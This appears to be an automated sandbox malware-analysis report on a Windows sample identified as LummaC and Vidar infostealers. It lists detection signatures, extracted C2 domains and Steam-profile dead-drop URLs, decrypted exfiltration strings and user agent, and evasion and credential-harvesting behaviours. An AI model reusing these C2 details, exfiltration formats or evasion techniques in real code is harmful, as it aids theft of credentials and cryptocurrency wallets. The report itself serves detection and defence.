Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1524997
MD5:	c9784db0c88a05a8aae9ddb7289b51db
SHA1:	7ce51feb0e818f5acb6ba4f1deb9f4fef04d7cd6
SHA256:	fa8e8dfb272f18daaece8b6ac3f9d6b16f9484764aff1005c9096909d75f760d
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Vidar

Yara detected Vidar stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Country aware sample found (crashes after keyboard check)

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Sigma detected: Silenttrinity Stager Msbuild Activity

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Signatures

AV Detection

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/	URL Reputation: Label: malware

Found malware configuration

Source: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "433cd71b7a2bdd3668a493b00ee95630"}
Source: 16.2.MSBuild.exe.400000.0.raw.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["treatynreit.site", "questionsmw.stor", "mysterisop.site", "soldiefieop.site", "abnomalrkmu.site", "absorptioniw.site", "snarlypagowo.site", "chorusarorp.site"], "Build id": "H8NgCl--"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\a43486128347[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\CBFCFBFBFB.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: absorptioniw.site
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: mysterisop.site
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: snarlypagowo.site
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: treatynreit.site
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: chorusarorp.site
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: abnomalrkmu.site
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: soldiefieop.site
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: questionsmw.stor
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: soldiefieop.site
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: - Screen Resoluton:
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: Workgroup: -
Source: 0000000D.00000002.2185212065.0000000000B18000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: H8NgCl--

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,	4_2_004080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	4_2_00408048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	4_2_00411E5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,	4_2_0040A7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C896C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	4_2_6C896C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_6C9EA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	4_2_6C9EA9A0

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:56263 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.166.76:443 -> 192.168.2.8:56266 version: TLS 1.2

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: freebl3.pdb source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
Source:	Binary string: mozglue.pdbP source: MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.4.dr
Source:	Binary string: freebl3.pdbp source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
Source:	Binary string: nss3.pdb@ source: MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr
Source:	Binary string: softokn3.pdb@ source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000004.00000002.2221135617.000000003823A000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.4.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000004.00000002.2215082591.000000002C352000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.4.dr
Source:	Binary string: nss3.pdb source: MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2231687114.000000006CABF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.4.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000004.00000002.2201069004.000000001FE28000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.4.dr
Source:	Binary string: softokn3.pdb source: MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0062735B FindFirstFileExW,	0_2_0062735B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	4_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,	4_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	4_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	4_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	4_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	4_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	4_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	4_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	4_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	4_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	4_2_0040CD37
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 13_2_00B0735B FindFirstFileExW,	13_2_00B0735B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 4_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

4_2_00415142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]	0_2_00639385
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax	0_2_00639385
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]	4_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax	4_2_004014AD
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov byte ptr [edi], al	13_2_00B4A08D
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then movzx esi, byte ptr [edx+eax-01h]	13_2_00B240E8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then movzx edx, word ptr [esp+eax*4+000000ACh]	13_2_00B240E8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov byte ptr [edi], al	13_2_00B4A004
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp+20h]	13_2_00B2E1F1
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	13_2_00B2C16C
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov word ptr [edx], ax	13_2_00B42158
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov byte ptr [edi], al	13_2_00B4A3E0
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov byte ptr [edi], al	13_2_00B4A3D9
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then movzx ecx, word ptr [edi]	13_2_00B424F8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	13_2_00B2E448
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov ebx, eax	13_2_00B22558
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov ebp, eax	13_2_00B22558
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp al, 2Eh	13_2_00B446B7
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp+14h]	13_2_00B426A8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then jmp eax	13_2_00B42778
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp]	13_2_00B449E3
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	13_2_00B5EABD
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	13_2_00B1CA28
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov byte ptr [edi], al	13_2_00B4AA72
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	13_2_00B5EB32
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h	13_2_00B5CB68
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then jmp dword ptr [00451A70h]	13_2_00B46C40
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	13_2_00B38C49
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esi+08h]	13_2_00B2AD3A
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp]	13_2_00B46D18
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then movzx eax, byte ptr [ebx+edx-06h]	13_2_00B1ED08
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then movzx esi, byte ptr [edx+ebp]	13_2_00B1ED08
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	13_2_00B32ED8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	13_2_00B3EEC8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp+24h]	13_2_00B44E06
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000080h]	13_2_00B2AE05
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov byte ptr [edi], al	13_2_00B4AE60
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov byte ptr [edi], al	13_2_00B4AE60
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov byte ptr [ebx], al	13_2_00B4AE60
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov byte ptr [edi], al	13_2_00B4AE60
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov word ptr [eax], dx	13_2_00B38FA8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov esi, ebx	13_2_00B60F90
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h	13_2_00B370AE
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov byte ptr [ebx], al	13_2_00B2B034
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp]	13_2_00B41018
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	13_2_00B5D063
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov dword ptr [esp+34h], edx	13_2_00B191CA
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov word ptr [eax], cx	13_2_00B3F128
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov word ptr [eax], cx	13_2_00B3F128
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000688h]	13_2_00B352C4
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then dec ebx	13_2_00B572C8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	13_2_00B2D225
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	13_2_00B2D215
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov dword ptr [esp+08h], ecx	13_2_00B1925D
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], D518DBA1h	13_2_00B573B8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], D1A85EEEh	13_2_00B573B8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp]	13_2_00B453BA
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov dword ptr [esp+18h], 3602043Ah	13_2_00B473A0
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov dword ptr [esp+50h], 00000000h	13_2_00B2D394
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov word ptr [eax], dx	13_2_00B393D1
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 7789B0CBh	13_2_00B5F508
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	13_2_00B59578
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp+68h]	13_2_00B5F6F8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp+000000D0h]	13_2_00B3560A
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [ebp-000000C0h]	13_2_00B277EF
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp+24h]	13_2_00B458E2
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh	13_2_00B618E8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	13_2_00B538C8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp+54h]	13_2_00B37A89
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov byte ptr [ebx], al	13_2_00B4BAD6
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov byte ptr [ebx], al	13_2_00B4BAD6
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov byte ptr [ebx], al	13_2_00B4BAD6
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov byte ptr [ebx], al	13_2_00B4BAD6
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	13_2_00B1DAD8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	13_2_00B27AD8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h	13_2_00B5BA38
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp byte ptr [ebp+ebx+00h], 00000000h	13_2_00B45A23
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh	13_2_00B61A78
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then jmp dword ptr [0045042Ch]	13_2_00B37A4B
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	13_2_00B2BBF4
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp word ptr [ecx+edx+02h], 0000h	13_2_00B61BF8
Source: C:\ProgramData\CBFCFBFBFB.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh	13_2_00B61BF8
